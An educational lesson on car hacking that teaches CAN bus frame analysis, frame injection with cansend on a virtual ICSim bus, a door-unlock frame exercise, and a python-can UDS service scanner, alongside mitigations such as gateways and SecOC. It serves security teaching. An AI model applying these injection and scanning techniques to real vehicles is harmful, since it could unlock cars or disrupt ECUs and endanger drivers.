Car Hacking 101: Reverse Engineering the CAN Bus
Automotive Cybersecurity Pathway
1. Materials & Setup
Hardware & Software Requirements:
- Computer: Windows, macOS, or Linux (64-bit CPU, minimum 8GB RAM).
- Virtualization (Highly Recommended): VirtualBox or VMware running Kali Linux or Ubuntu LTS.
- Software Tools (Free/Open Source):
- can-utils (the Linux SocketCAN debugging tools: candump, cansniffer, cansend, cangen).
- ICSim (Instrument Cluster Simulator by Craig Smith): a virtual car dashboard plus a controller window, so you can practise on a virtual bus without touching a real vehicle.
- Offline/Analogue Alternative: If you cannot run a Linux VM today, a paper-and-pencil CAN frame analysis sheet is provided in the "We Do" section.
2. Learning Objectives & Success Criteria
| What You Will Learn (Objectives) | How You Will Prove It (Success Criteria) |
|---|---|
3. Introduction: The Jeep Cherokee Incident
Imagine this scenario...
In 2015, security researchers Charlie Miller and Chris Valasek sat on a couch miles away from a highway. Using only their laptops and the vehicle's cellular connection, they reached a Jeep Cherokee driving at 70 mph. They compromised the Uconnect infotainment system, used it as a bridge onto the vehicle's internal network, and proceeded to turn the air conditioning to full blast, blast hip-hop from the radio, activate the windshield wipers, and eventually kill the transmission in the middle of traffic.
How did they do this? Once on the internal network they could speak directly to the fundamental nervous system of the modern vehicle: the CAN bus. Modern cars are not just mechanical machines; they are networks of dozens to over a hundred small computers called Electronic Control Units (ECUs). Today we are going to learn how to speak their language, intercept their messages, and understand how to secure them.
4. Deep Dive & Practice
Bosch began developing the CAN bus in 1983 (the first specification was published in 1986). At the time, cars were closed systems with no cellular connections, no Bluetooth, and no Wi-Fi, so the protocol was optimised for speed, low cost, and reliability in electrically noisy environments, not for hostile traffic. That gives it three properties an attacker can exploit:
- No encryption: payloads travel in the clear. The hexadecimal you see in candump is simply the raw bytes; nothing has to be decoded or broken.
- No authentication and no source address: a frame carries an arbitration ID, a length, and data, but nothing that says which ECU sent it, and there are no signatures or message authentication codes. A brake controller cannot tell whether a "stop" command came from the brake pedal module or from a compromised infotainment unit, so it trusts everything.
- Broadcast network: every node on a segment receives every frame whether or not it needs it, so a single compromised node (or a laptop on the OBD-II port) can both read and inject any traffic on that segment.
Anatomy of a CAN Frame (The Packet)
A standard CAN message, as the tools display it, looks like this:
1A3 # 8 [ 00 FF 2C 00 00 00 05 AA ]
- CAN ID (arbitration ID): 1A3 (hexadecimal; 11 bits on a standard bus, so 000 to 7FF). It is both the address and the priority indicator: when two nodes start transmitting at the same instant, the lower ID wins arbitration, because its dominant (0) bits override the other node's recessive (1) bits. In this vehicle, ID 1A3 might represent the steering-wheel controls.
- DLC (data length code): 8. The number of data bytes that follow (at most 8 on classic CAN; CAN FD extends this to 64).
- Data payload: 00 FF 2C 00 00 00 05 AA. These eight bytes carry the actual values, and their meaning is defined by the manufacturer, not by the protocol. The third byte (index 2, 2C) could represent the steering-wheel angle, while the last byte (index 7, AA) might indicate whether the horn button is pressed.
On the wire the frame also carries a CRC and an acknowledgement slot, but those protect against electrical errors, not against a node that deliberately sends well-formed frames, so the tools do not show them.
Let's work together to isolate a specific action from a stream of network noise. Imagine you are sniffing a car's network while the driver is pressing the volume buttons on the steering wheel. We want to find which CAN ID controls the volume, and what the exact "Volume Up" payload is.
Look at the captured packets below. What patterns do you notice changing when actions occur?
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
2C4 # 4 [ 1A BB 00 00 ]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
[USER PRESSES "VOLUME UP"]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
2C4 # 4 [ 1A BB 01 00 ]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
[USER RELEASES BUTTON]
2C4 # 4 [ 1A BB 00 00 ]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
[USER PRESSES "VOLUME DOWN"]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
2C4 # 4 [ 1A BB 02 00 ]
2C4 # 4 [ 1A BB 02 00 ]
Step-by-Step Analysis:
- Identify the changing ID: ID 0A1 never changes its payload (always 00 00 12 F0 45 00 00 00); it is background traffic. ID 2C4 is the one whose payload changes exactly when the button events occur, so 2C4 carries the volume controls.
- Isolate the variable byte: compare 2C4 when idle (1A BB 00 00), during volume up (1A BB 01 00), and during volume down (1A BB 02 00). Only byte index 2 (the third byte) changes: 00 = released, 01 = up, 02 = down. The other bytes are constant and can be copied as they are.
- Formulate the injected command: to simulate "Volume Up" you transmit the same frame the steering-wheel module would send:
cansend vcan0 2C4#1ABB0100
cansend puts a single frame on the bus. The real module keeps transmitting 1A BB 00 00 ("released"), so the head unit sees your 01 once and then returns to idle; to hold the button down you repeat the frame faster than the legitimate sender, for example in a shell loop (while true; do cansend vcan0 2C4#1ABB0100; sleep 0.01; done). Injection works at all only because the receiver has no way to tell your frame from the genuine one.
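The same analysis as a script, added here as an example for this lesson (it is not part of ICSim or can-utils). It parses a capture written in this page's notation (and in the formats candump and cansend use), tags each frame with the bracketed event marker that precedes it, reports which IDs and byte indexes vary, reads off the value each event produces, and formats the result for cansend. The input is the volume-button capture above, embedded verbatim as constructed sample data; the frame layout (ID, DLC, data) follows the anatomy section.

```python
import re
from collections import defaultdict, namedtuple

# One parsed frame: arbitration ID plus 0..8 data bytes (the wire-level CRC/ACK are not shown by the tools).
Frame = namedtuple("Frame", ["can_id", "data"])

# Accepted notations: the lesson's "2C4 # 4 [ 1A BB 01 00 ]", candump's
# "  vcan0  2C4   [4]  1A BB 01 00" and the cansend / candump -L form "2C4#1ABB0100".
LESSON_RE = re.compile(r"\b([0-9A-F]{3,8})\s*#\s*\d+\s*\[((?:\s*[0-9A-F]{2})*)\s*\]", re.I)
CANDUMP_RE = re.compile(r"\b([0-9A-F]{3,8})\s+\[\d+\]((?:\s+[0-9A-F]{2})*)", re.I)
CANSEND_RE = re.compile(r"\b([0-9A-F]{3,8})#([0-9A-F]*)", re.I)
# A line that is nothing but "[...]" is an event marker, e.g. [USER PRESSES "VOLUME UP"].
EVENT_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")

# The volume-button capture from the lesson, embedded so the script runs offline.
VOLUME_CAPTURE = """\
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
2C4 # 4 [ 1A BB 00 00 ]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
[USER PRESSES "VOLUME UP"]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
2C4 # 4 [ 1A BB 01 00 ]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
[USER RELEASES BUTTON]
2C4 # 4 [ 1A BB 00 00 ]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
[USER PRESSES "VOLUME DOWN"]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
2C4 # 4 [ 1A BB 02 00 ]
2C4 # 4 [ 1A BB 02 00 ]
"""


def parse_frame(line):
    """Return the Frame on a line, or None if the line holds no frame."""
    for rx in (LESSON_RE, CANDUMP_RE, CANSEND_RE):
        m = rx.search(line)
        if m:
            return Frame(int(m.group(1), 16), bytes.fromhex(m.group(2).replace(" ", "")))
    return None


def parse_capture(text):
    """Frames in order, each tagged with the latest event marker ("baseline" before any)."""
    tagged, event = [], "baseline"
    for line in text.splitlines():
        marker = EVENT_RE.match(line)
        if marker:
            event = marker.group(1)
        elif (frame := parse_frame(line)):
            tagged.append((event, frame))
    return tagged


def variable_bytes(tagged):
    """{can_id: byte indexes that vary} for every ID whose payload is not constant.
    This is the offline version of what cansniffer -c highlights in colour."""
    payloads = defaultdict(set)
    for _, f in tagged:
        payloads[f.can_id].add(f.data)
    result = {}
    for can_id, seen in payloads.items():
        if len(seen) > 1:
            width = max(map(len, seen))
            result[can_id] = {i for i in range(width)
                              if len({p[i] if i < len(p) else None for p in seen}) > 1}
    return result


def values_per_event(tagged, can_id, index):
    """{event: values seen} for one ID and byte index, to read off what each value means."""
    seen = defaultdict(set)
    for event, f in tagged:
        if f.can_id == can_id and index < len(f.data):
            seen[event].add(f.data[index])
    return dict(seen)


def replay_frame(tagged, can_id, event):
    """The frame to inject to reproduce an event: the payload that ID carried during it."""
    return next((f for ev, f in tagged if ev == event and f.can_id == can_id), None)


def cansend_arg(frame):
    """Format a frame as cansend wants it: 3 hex digits for 11-bit IDs, 8 for 29-bit, no spaces."""
    width = 8 if frame.can_id > 0x7FF else 3
    return f"{frame.can_id:0{width}X}#{frame.data.hex().upper()}"


if __name__ == "__main__":
    tagged = parse_capture(VOLUME_CAPTURE)
    for can_id, idxs in variable_bytes(tagged).items():
        for i in sorted(idxs):
            print(f"ID {can_id:03X} byte {i}:", values_per_event(tagged, can_id, i))
    up = replay_frame(tagged, 0x2C4, 'USER PRESSES "VOLUME UP"')
    print("inject with: cansend vcan0", cansend_arg(up))
```

To use it on your own session, save `candump -L vcan0 > log.txt`, insert a bracketed marker line before each action you performed, and point `parse_capture` at the file; timestamps and trailing comments on a line are ignored by the parsers.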
Choose the track that fits your current setup today:
Option A: Interactive Software Simulation (If you have a Linux VM ready)
- Open your terminal and create a virtual CAN network device (vcan is a loopback-style interface, so nothing leaves the VM):
sudo modprobe vcan
sudo ip link add dev vcan0 type vcan
sudo ip link set up vcan0
- Clone and compile ICSim from GitHub (or run your pre-installed package).
- Launch the simulator window (the car cluster) and the controller window (your joystick pad), both attached to vcan0:
./icsim vcan0
./controls vcan0
- Open a second terminal window and run:
cansniffer -c vcan0
cansniffer shows one line per CAN ID and, with -c, highlights the bytes that changed since that ID's previous frame, so steady background traffic fades out and the frame you are looking for stands out.
- While watching the sniffer, press the lock button on the controller. Find the packet ID whose bytes flash, and note which byte changes and to what value.
- Use the terminal to inject your own command to unlock the virtual doors. Type:
cansend vcan0 [ID]#[PAYLOAD]
where [ID] is the three-hex-digit arbitration ID you found and [PAYLOAD] is the data bytes written as one hex string with no spaces, in the same layout as the volume example.
Option B: Analytical Reverse-Engineering Case Study
Analyze this raw captured packet stream of a car while the driver uses the key fob to lock and unlock the driver's door. Your goal is to write down the exact frame that an attacker with access to the OBD-II port would broadcast to unlock the door (assuming, as in many older vehicles, that the diagnostic port sits on the same bus segment as the body controller with no gateway filtering between them).
[09:00:01] 1E5 # 8 [ 04 22 00 00 F0 FF 00 12 ] (Idle Status)
[09:00:02] 1E5 # 8 [ 04 22 00 00 F0 FF 00 12 ] (Idle Status)
[09:00:03] 3A9 # 5 [ 00 00 FF 11 00 ] (Status Query)
[09:00:04] 1E5 # 8 [ 04 22 88 01 F0 FF A1 12 ] (Fob Button Pressed: "LOCK")
[09:00:05] 1E5 # 8 [ 04 22 00 00 F0 FF 00 12 ] (Idle Status)
[09:00:06] 1E5 # 8 [ 04 22 88 02 F0 FF B2 12 ] (Fob Button Pressed: "UNLOCK")
[09:00:07] 1E5 # 8 [ 04 22 00 00 F0 FF 00 12 ] (Idle Status)
Your Analysis Task:
- Which Arbitration ID controls the lock mechanism?
- Which byte index contains the operational trigger? (More than one byte differs between the LOCK and UNLOCK frames; decide which one encodes the action and what the others might be, for example a counter or checksum.)
- What is the exact 16-hex-character payload required to execute an UNLOCK command?
5. Assessment & Check for Understanding
Self-Check Concept Questions:
Q1: Why doesn't the target ECU block a command from an attacker's computer plugged into the OBD-II port?
Answer: Because the CAN bus protocol has no authentication and frames carry no sender address. The OBD-II port is just another node on the bus, so an ECU has no way to distinguish the attacker's laptop from the legitimate sender; it treats every well-formed frame as valid.
Q2: If an ID 0x005 and an ID 0x1E5 try to send a packet at the exact same instant, which packet goes first?
Answer: ID 0x005 wins. CAN arbitration is bitwise: both nodes start transmitting their ID at the same time, and at the first bit where they differ the node sending the dominant 0 keeps the bus while the other stops and retries after the frame. A lower numerical arbitration ID therefore always wins arbitration. This is not preemption: a frame already in progress is never interrupted, so a low-ID node can only win the bus when it is idle.
Summative Challenge: Security Architecture Briefing
Draft a 1-page "Threat Intelligence Report" or record a 3-minute voice memo answering the following questions for a car manufacturer:
- Explain step-by-step how you were able to bypass the vehicle defenses (virtually) to gain entry.
- Identify what mitigation techniques should be designed into next-generation cars to prevent this. (Hint: think about gateway ECUs that filter traffic between the infotainment and diagnostic segments and the powertrain and body buses; message authentication codes on frames, such as AUTOSAR SecOC, which the 64-byte payload of CAN FD leaves room for; and hardware security modules such as a Secure Hardware Extension (SHE) or HSM to keep the keys out of reach of compromised firmware.)
6. Differentiation & Extension Options
For Extra Guidance (Scaffolding):
If hexadecimal is hard to read: each data byte is just a number from 0 to 255 written in base 16, so you can read it as a percentage scale.
00 is 0 (completely off, 0%). FF is 255 (completely on, 100%).
7F is 127 (roughly half, 50%).
For Advanced Learners (Extension):
Python automation challenge: Use the python-can library to write a script that sends a diagnostic request to each arbitration ID from 0x000 to 0x7FF and watches for replies, then fuzzes the IDs that answer with different service and sub-function bytes to map which UDS (Unified Diagnostic Services, ISO 14229) services an ECU exposes, including undocumented ones. Run it against ICSim or a bench ECU only: unsolicited diagnostic requests can switch a real ECU into a diagnostic session or reset it.
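A starting point for this challenge, added here as an example; it is not taken from python-can, ICSim, or any vendor tool. It scans every 11-bit ID with a UDS TesterPresent request (service 0x3E) wrapped as an ISO-TP single frame, then probes each request service ID on the ECUs that answered, using negative response code 0x11 (serviceNotSupported) to separate absent services from present ones. The bus is abstracted as a function `xfer(request_id, data)` returning `(response_id, data)` or `None`; `FakeEcuBus` is a constructed stand-in with one ECU at the conventional 0x7E0/0x7E8 pair so the script runs offline, and `socketcan_xfer` is the adapter for a real or virtual interface. Assumptions: python-can's 4.x API (`can.Bus`, `can.Message`, `recv`), and single-frame replies only (multi-frame ISO-TP responses are reported as `None`).

```python
import time

SID_SESSION_CONTROL, SID_READ_DID, SID_TESTER_PRESENT = 0x10, 0x22, 0x3E
NEGATIVE_RESPONSE = 0x7F
NRC_NAMES = {0x11: "serviceNotSupported", 0x12: "subFunctionNotSupported",
             0x13: "incorrectMessageLengthOrInvalidFormat", 0x33: "securityAccessDenied"}


def uds_request(sid, *args):
    """ISO-TP single frame: length nibble, SID, arguments, zero padding to 8 bytes (max 7 payload bytes)."""
    body = bytes([sid, *args])
    return bytes([len(body)]) + body + bytes(7 - len(body))


def parse_response(data):
    """Decode a single-frame reply -> ("positive", sid, payload) | ("negative", sid, nrc).
    First, consecutive and flow-control frames (high nibble != 0) return None."""
    if not data or data[0] >> 4 != 0:
        return None
    body = data[1:1 + (data[0] & 0x0F)]
    if len(body) >= 3 and body[0] == NEGATIVE_RESPONSE:
        return "negative", body[1], body[2]
    return ("positive", body[0] - 0x40, bytes(body[1:])) if body else None


def discover_ecus(xfer, ids=range(0x000, 0x800)):
    """TesterPresent to every 11-bit ID; returns {request_id: response_id} for IDs that answer."""
    found = {}
    for req_id in ids:
        reply = xfer(req_id, uds_request(SID_TESTER_PRESENT, 0x00))
        parsed = parse_response(reply[1]) if reply else None
        if parsed and parsed[1] == SID_TESTER_PRESENT:
            found[req_id] = reply[0]
    return found


def probe_services(xfer, req_id, sids=range(0x00, 0x40)):
    """Send each request SID with no arguments. NRC 0x11 means the service is absent; a positive
    reply or any other NRC means the ECU implements it. Returns {sid: nrc or None} for present ones."""
    present = {}
    for sid in sids:
        reply = xfer(req_id, uds_request(sid))
        parsed = parse_response(reply[1]) if reply else None
        if parsed and (parsed[0] == "positive" or parsed[2] != 0x11):
            present[sid] = None if parsed[0] == "positive" else parsed[2]
    return present


class FakeEcuBus:
    """Constructed stand-in for a bus with one ECU: requests on 0x7E0, replies on 0x7E8.
    It implements only DiagnosticSessionControl, ReadDataByIdentifier and TesterPresent."""
    REQ_ID, RESP_ID = 0x7E0, 0x7E8

    def __call__(self, req_id, data):
        if req_id != self.REQ_ID:
            return None                                  # nobody listens on this ID
        sid, args = data[1], data[2:1 + (data[0] & 0x0F)]
        if sid not in (SID_SESSION_CONTROL, SID_READ_DID, SID_TESTER_PRESENT):
            return self.RESP_ID, self._negative(sid, 0x11)
        if sid == SID_TESTER_PRESENT and args == b"\x00":
            return self.RESP_ID, self._positive(sid, 0x00)
        if sid == SID_SESSION_CONTROL and args in (b"\x01", b"\x03"):
            return self.RESP_ID, self._positive(sid, args[0], 0x00, 0x32, 0x01, 0xF4)  # P2/P2* timings
        return self.RESP_ID, self._negative(sid, 0x13)   # known service, malformed request

    @staticmethod
    def _positive(sid, *payload):
        body = bytes([sid + 0x40, *payload])
        return bytes([len(body)]) + body + bytes(7 - len(body))

    @staticmethod
    def _negative(sid, nrc):
        return bytes([0x03, NEGATIVE_RESPONSE, sid, nrc]) + bytes(4)


def socketcan_xfer(channel="vcan0", timeout=0.05):
    """Same call shape on a real or virtual interface through python-can (assumed 4.x API, imported
    lazily so the rest of the file runs without it). Unrelated traffic is skipped until a frame that
    parses as a reply to the SID we sent arrives, or the timeout expires."""
    import can
    bus = can.Bus(interface="socketcan", channel=channel)

    def xfer(req_id, data):
        bus.send(can.Message(arbitration_id=req_id, data=data, is_extended_id=False))
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            msg = bus.recv(timeout=timeout)
            parsed = parse_response(bytes(msg.data)) if msg else None
            if parsed and parsed[1] == data[1]:
                return msg.arbitration_id, bytes(msg.data)
        return None
    return xfer


if __name__ == "__main__":
    xfer = FakeEcuBus()          # swap in socketcan_xfer("vcan0") to run against ICSim
    for req_id, resp_id in discover_ecus(xfer).items():
        print(f"UDS ECU: request {req_id:03X} -> response {resp_id:03X}")
        for sid, nrc in probe_services(xfer, req_id).items():
            print(f"  service {sid:02X}: " + ("accepted" if nrc is None
                  else f"NRC {nrc:02X} ({NRC_NAMES.get(nrc, 'other')})"))
```

The probe deliberately sends each service with no sub-function, so even services the ECU implements usually come back with NRC 0x13 rather than a positive reply; that is the signal you want, since the interesting question is which services exist, not whether a blind call succeeds. On real hardware add a short delay between frames and keep the scan to a bench ECU or ICSim.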